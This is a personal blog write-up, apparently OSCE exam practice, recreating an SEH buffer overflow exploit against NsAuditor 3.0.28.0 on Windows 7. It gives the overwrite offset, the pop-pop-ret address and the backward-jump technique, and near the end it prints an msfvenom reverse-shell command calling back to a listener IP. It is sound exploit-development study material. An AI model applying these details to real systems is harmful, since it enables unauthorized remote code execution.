NsAuditor 3.0.28.0 – BOF with a lot of jumps!
Well on my way to (hopefully) obtaining my OSCE and I’m still busy recreating exploits from exploitdb. This weekend I was busy working on NSauditor 3.0.28.0. NsAuditor is a “Network Security Auditor” that apepars to let you see running proceses, open network connections among other things. This was a particularly fun one to recreate as it involved more than a few JMPs, an ASCII limited character set and an inability to use NOPS (\x90). So here we go…..
- Vulnerable App: NsAuditor 3.0.28.0
- Operating System: Win7 (32bit)
- First, as my task was crafting an exploit I didnt bother wasting time trying to fuzz the application. Instead the comments from exploitdb referenced that using that unsantized input could cause a crash.
data:image/s3,"s3://crabby-images/2fc2e/2fc2e6663cfde340740c0a35ad7b28f7d4e6f3c6" alt=""
data:image/s3,"s3://crabby-images/24c47/24c4716e94df570dbd1424ddb60b287afb8be4cc" alt=""
2. From there I started with a usual 5000 A’s and noticed that i was able to cause a crash.
Upon further inspection i noticed that 5k A’s didnt seem to overwrite SEH or EIP. So as I tend to do I tried to map the crash. Specificallying varying the amount of As above and below trying to identify where SEH may get overridden, EIP, and the states of various registers.
data:image/s3,"s3://crabby-images/30ed0/30ed0085094a784e4d9c49ff933b6fa2ecc576b9" alt=""
data:image/s3,"s3://crabby-images/58796/5879609544a1b9ac496c6084cb198131abfa1f2e" alt=""
3. Eventually I landed on 20k bytes and from there then created a buffer of length 20000 and found that an offset overwrite of SEH occurred at 5239 bytes
data:image/s3,"s3://crabby-images/fed5e/fed5e0fb74a0cf671f829e3993795476ef59a8e1" alt=""
4. I reran my exploit and confirmed that SEH was overwritten
data:image/s3,"s3://crabby-images/d12ea/d12ea02af73e320ebea7551e54b10bd07436dc54" alt=""
data:image/s3,"s3://crabby-images/f3c9e/f3c9e33496bce233def93040c821cc6998ffa2cd" alt=""
5. I then ran mona looking for pop pop ret that i could use to use gain control the stack. I eventually used 0x006ED96D
data:image/s3,"s3://crabby-images/36a89/36a89b5ff58e4a0d9a890bdda9e58c5fc6c046ca" alt=""
data:image/s3,"s3://crabby-images/2f03a/2f03a5a8568c667626438875b1c173e3b21e145a" alt=""
data:image/s3,"s3://crabby-images/a7384/a73848ee256e65bc2693aea7e1030052aa762b04" alt=""
6. This jump landed be into a buffer space where there was only room to go up so I used a technique to do a short backward jump by 80 bytes in the Next SEH bytes
data:image/s3,"s3://crabby-images/f4f42/f4f42d84aa939e9fc91f159c317a52c87781133e" alt=""
data:image/s3,"s3://crabby-images/00b59/00b591cd9fb1abe503f22b8b199d4b328cba0c88" alt=""
data:image/s3,"s3://crabby-images/f7167/f716746602accbccacdef4320c8c64f7bddc8762" alt=""
7. Unfortuantely that only took me 80 bytes up into my buffer with another island of existing code. So I took another jump of about 18 bytes to get some more space to work with
data:image/s3,"s3://crabby-images/b7cef/b7cefdd88ad36c3a4b9568294d43ae52773ab01d" alt=""
8. With that little extra space I decided to pop the current value of the stack into EAX, subtract it and then jumped to that location. Notably I had to use a relatively small (120 decimal / 78 in hex value to avoid \x00 which appeared to be a bad character.
data:image/s3,"s3://crabby-images/bd791/bd7913f8daf518f85e72733a180a4da80fcb887e" alt=""
9. From there i landed in a big-o-buffer! Using all that extra space I dropped into some alignment code for my stack as well as code to align EAX to the start of a shell code
data:image/s3,"s3://crabby-images/d2c30/d2c3034638276905e88e7235cb359a2b46fc2613" alt=""
10. Took me a few tries to get the shell code and its necessary alignment correct. The trick was that i had to restrict the character set to just alpha numeric (i.e. possible input for that DNS field), explicitly restrict the use of null (\x00) and then set the BufferRegister=EAX to avoid any non alpha numeric opcode
data:image/s3,"s3://crabby-images/f9895/f9895aab51f016241d9ece62ac6ff52c214b0e44" alt=""
msfvenom -p windows/shell_reverse_tcp -e x86/alpha_mixed lhost=192.168.1.198 lport=443 -f python -v shell -b “\x00” BufferRegister=EAX
11. From there I executed my shell with a waiting handler
data:image/s3,"s3://crabby-images/77ac6/77ac6af1077ff7208590d7a316e8539efe84e2f9" alt=""